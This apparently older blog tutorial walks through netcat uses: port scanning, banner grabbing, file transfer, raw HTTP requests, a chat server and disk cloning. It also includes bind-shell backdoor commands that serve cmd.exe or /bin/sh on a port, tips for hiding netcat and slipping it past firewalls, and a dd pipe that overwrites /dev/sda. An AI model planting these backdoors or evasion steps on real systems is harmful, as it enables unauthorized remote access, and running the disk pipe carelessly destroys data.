In this tutorual will go over the most useful netcat commands. Netcat is a tool that every IT professional should have in their tool box, if you’re responsible for network or systems security, it is essential that you understand the capabilities of netcat. The original version of netcat is a UNIX program. Its author is known as Hobbit. He released version 1.1 in March of 1996. Netcat is available for Unix and Windows OS.
Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities, including: port scanner, backdoor, port redirector, port listener, and lots of other things….Let’s see what we can do with netcat.
Tips for using netcat in windows:
Here are some tips for hiding netcat on a system or using it behind a firewall.
* Rename the executable or compile the application yourself
* Detach from the console using the -d option
* Use a port that is well known and allowed through firewalls
Port scanner: netcat doesn’t have the features that nmap offers, but if you want to see what ports are open it will do the job. The command bellow will scan the target computer from port 1 to 150
nc -v -w 2 -z 192.168.10.10 1-150
Banner Grabbing: if you’re interested what Operating Systems is running behind port 80(http) or 21(ftp), you can use netcat to grab banner.
nc -v -n 192.168.10.10 80
(UNKNOWN) [192.168.10.10] 80 (?) open
HTTP/1.1 400 Bad Request
Date: Sat, 07 June 2008 20:50:04 GMT
Backdoor: if you want to use it as a backdoor to get a remote command or shell…
nc -L -p 1001 -d -e cmd.exe
The -L option tells netcat not to close and wait for connections, the -p specifies the port netcat listens on, the -d is telling netcat to detach from the process we want it to run, and -e tells what program to run once the connection is made, in this case the cmd.exe(command promp)
and in Unix/Linux systems…
nc -l -p 1001 -e /bin/sh
to connect to 192.168.10.10, issue this command
nc 192.168.10.10 1001
File Transfer: Let’s say that you want to transfer a file from one machine to another
on the receiving host 192.168.10.10
nc -l -p 1001 > file.txt
on the sending machine
nc 192.168.10.10 < file.txt
Spoofing HTTP Headers: You can use netcat to connect to a server using completely spoofed headers. You can actually type out your user agent, referrer and etc. It’s useful when you want to generate bunch of hits that can be easily found in the logs or something like that:
C:\>nc ubuntu-box 80
GET / HTTP/1.1
Note that your request won’t be sent until you generate a blank line. So hit return twice when your are done typing. You will get a response of headers and HTML streaming down your screen
HTTP/1.1 200 OK
Date: Sun, 08 Jun 2008 01:04:02 GMT
Server: Apache/2.2.8 (Ubuntu)
Last-Modified: Wed, 07 May 2008 19:33:34 GMT
Chat Server: if you need to start a chat application quick and easy without the need for installing msn or yahoo IM…
start listening for connection on the client machine 192.168.10.10
nc -l -p 1001
on the remote machine, use the following command and start typing when you press enter the message will display on the remote machine.
nc 192.168.10.10 1001
Hard Drive Cloning Over the Network: to clone the entire hard drive or just a partition, the partition needs to be unmounted so it is a good practice to boot the system from a live cd and then create the image.
on the receiving machine..
nc -l -p 1001 | dd of=/dev/sda
on the system you want to clone do.
dd if=/dev/sda | nc 192.168.10.10 1001
conclusion: Netcat is a tool that every IT professional should be familiar with, it is a good tool to test the security of your network, like testing your firewall/routers and Operating Systems. It should be use with caution and I don’t suggest installing it in a production enviroment.